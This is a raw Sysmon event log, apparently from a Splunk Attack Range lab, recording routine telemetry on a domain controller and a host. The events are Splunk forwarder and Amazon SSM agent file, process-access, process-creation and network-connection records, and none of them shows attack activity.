Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C54717832202F9994FAF3EE50A70F35D,SHA256=BDBA7194ED4874B97DB041A1FA67D66BCA43120E54A4E7E50ACFC9C6228D8CD6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216562Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:14.332{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBE63EE10281434F674D1806F51094E6,SHA256=B76EF62C0B035A804793B08295FA4CC3594118BEA2B8B0D32711661CF6DFA8C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287644Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:15.588{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DBB1E86B5FD725296F4D644D82D43EC,SHA256=B5AAD50B47E513820E36809E2E1658D9E3994E048E2A675E82E763C64232CD00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216563Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:15.348{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2681813A7F41D91B8D9AE079D1112815,SHA256=0DB7E4E5F4434CA750DC656EF07B642B27C3C6D2B2C3297F88ACCB749662E1DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287643Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:15.434{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-133MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287647Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:14.528{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53434-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000287646Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:16.602{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=558590F47B1DCBB370CB0CDEDA5C4820,SHA256=CFCCA24B3E50EA59EB64293ED216878CC9C0088D2968AB8B2EED25A99F7FD775,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216564Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:16.364{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9121203AA34F0D6FCF3AEF4769F9D97,SHA256=4095D7960332B0BEA254CCD0B96B12105B39F449E05392940C7248C6F2E592A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287645Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:16.433{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-134MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287648Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:17.637{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2609C7E91E89215332145769EC3818D7,SHA256=A7769A6B3D9DEA2BDBB8C35F9CA73B9A7F99DA9FAE64FC30CD068987193DCC11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216565Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:17.365{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4667F3D6EAFF2A9C1FBE9E16A9DF6C38,SHA256=35A3B742FE86AF4388B2D0ABEE75C64776E03A6BDE28215C599E2F9C85BD3375,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216566Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:18.379{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBA18E76046090C260CEC56271360412,SHA256=A2BF13F9A29B30627FBCE9DF94EA84B418A793213C87F12F5AA1EF4AAE165FF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287649Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:18.652{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A3CD369976F6E22A53D9D439BE72381,SHA256=5C4A96A3DECD6B5CF5132A4D8EC3C0197C7BE38757E161098A647231F6726F20,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000287667Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:19.965{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-116B-6216-0905-000000003802}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287666Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:19.965{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287665Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:19.965{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287664Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:19.965{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287663Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:19.965{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287662Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:19.965{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-116B-6216-0905-000000003802}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000287661Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:19.965{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-116B-6216-0905-000000003802}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000287660Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:19.966{C8EA50B7-116B-6216-0905-000000003802}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000287659Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:19.699{C8EA50B7-116B-6216-0805-000000003802}38563316C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000287658Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:19.684{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C4B7C05E649370DBFF7AF1EC4708226,SHA256=A61A28DD1D1C9FF672F3B6016EE50FE3EE5AA6338429439A199B97FA6D69D453,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216568Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:19.598{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE275E4C08493EEA4EDBFCC434EB1F4F,SHA256=605114720C5A08CA2DA3974BE84001A74ACC0A908619821AA0AB321EED5C07FA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216567Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:16.587{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51335-false10.0.1.12-8000- 10341000x8000000000000000287657Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:19.465{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-116B-6216-0805-000000003802}3856C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287656Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:19.465{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287655Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:19.465{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287654Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:19.465{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287653Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:19.465{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287652Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:19.465{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-116B-6216-0805-000000003802}3856C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000287651Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:19.465{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-116B-6216-0805-000000003802}3856C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000287650Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:19.466{C8EA50B7-116B-6216-0805-000000003802}3856C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000216569Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:20.613{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C3FDBA12462CDDDF291F7A353ADBCAA,SHA256=8133422130B8C0429727FA62260CABB8E397523E98327ABC9504A24CBFBEDC23,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000287686Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:20.965{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-116C-6216-0B05-000000003802}5524C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287685Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:20.965{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287684Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 